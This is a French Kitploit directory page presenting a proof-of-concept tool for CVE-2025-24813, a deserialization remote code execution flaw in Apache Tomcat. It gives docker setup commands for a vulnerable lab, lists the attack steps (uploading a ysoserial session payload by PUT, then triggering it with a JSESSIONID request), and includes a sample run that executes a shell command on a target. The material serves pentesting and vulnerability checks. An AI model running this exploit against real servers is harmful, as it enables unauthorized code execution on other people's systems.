Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24813 — Preuve de concept (PoC) script pour CVE-2025-24813, vulnérabilité dans Apache Tomcat. | Kitploit
Outils/GitHubGitHub/hakankarabacak/cve-2025-24813
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubhakankarabacak/cve-2025-24813

CVE-2025-24813

Preuve de concept (PoC) script pour CVE-2025-24813, vulnérabilité dans Apache Tomcat.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24813

Script de preuve de concept (PoC) pour la vulnérabilité CVE-2025-24813 dans Apache Tomcat.

Ce script a été modifié à partir du lien associé et adapté à mes besoins.

Configuration de l'environnement Tomcat vulnérable

Environnement basé sur l'image officielle Tomcat 9.0.90. Il supprime la restriction de lecture seule du serveur et le configure pour enregistrer les données de session sur le disque. Ensuite, il déploie automatiquement l'application en copiant le fichier ROOT.war dans le répertoire webapps/ de Tomcat.

root@kitploit:~
docker build -t cve-2025-24813 .
docker run --name cve-2025-24813 -it -d -p 8080:8080 cve-2025-24813

Fonctionnement

  1. Un fichier check.txt avec l'en-tête Content-Range est placé pour vérifier si le serveur accepte les requêtes PUT.
  2. Si le serveur est accessible en écriture, une charge utile pour la commande souhaitée est générée à l'aide de ysoserial.
  3. Le fichier de session malveillant est téléversé dans le répertoire via une requête PUT, en le liant à l'ID de session et au nom de fichier.
  4. Une requête GET est envoyée avec un personnalisé, déclenchant la désérialisation.
JSESSIONID
  • Le fichier de charge utile temporaire est supprimé du répertoire.
  • Utilisation

    root@kitploit:~
    $ python3 cve_2025_24813.py
    
    ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ███████╗      ██████╗ ██╗  ██╗ █████╗  ██╗██████╗
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔════╝      ╚════██╗██║  ██║██╔══██╗███║╚════██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗ █████╔╝███████║╚█████╔╝╚██║ █████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ╚════██║██╔══██╗ ██║ ╚═══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗███████║      ███████╗     ██║╚█████╔╝ ██║██████╔╝
    ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚══════╝      ╚══════╝     ╚═╝ ╚════╝  ╚═╝╚═════╝
     
                     --- Apache Tomcat Remote Code Execution PoC by Hakan Karabacak ---
    
    Enter target URL (e.g., http://target.com:8080): http://target.com:8080
    Enter command to execute (default: bash -c echo${IFS}$(id)>/tmp/RCE): 
    Enter path to ysoserial.jar (default: ysoserial.jar): 
    Enter ysoserial gadget chain (default: CommonsCollections6): 
    [*] Session ID: hk1337
    [+] Server is writable via PUT: http://target.com:8080/check.txt
    [*] Generating ysoserial payload for command: bash -c echo${IFS}$(id)>/tmp/RCE
    [+] Payload generated successfully: payload.ser
    [+] Payload uploaded with status 409 (Conflict): http://target.com:8080/hk1337.session
    [+] Exploit succeeded! Server returned 500 after deserialization.
    [+] Target http://target.com:8080 is vulnerable to CVE-2025-24813!
    [+] Temporary file removed: payload.ser
    

    PoC

    https://github.com/user-attachments/assets/5a271e6f-1126-459a-852b-603f39a68616

    Télécharger l’outil